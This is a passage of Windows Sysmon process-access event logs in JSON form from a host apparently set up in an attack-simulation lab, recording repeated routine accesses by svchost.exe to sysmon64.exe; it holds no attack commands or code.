C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1579,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1580,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1581,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1582,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1583,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1584,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1585,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.375","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1586,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.375\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 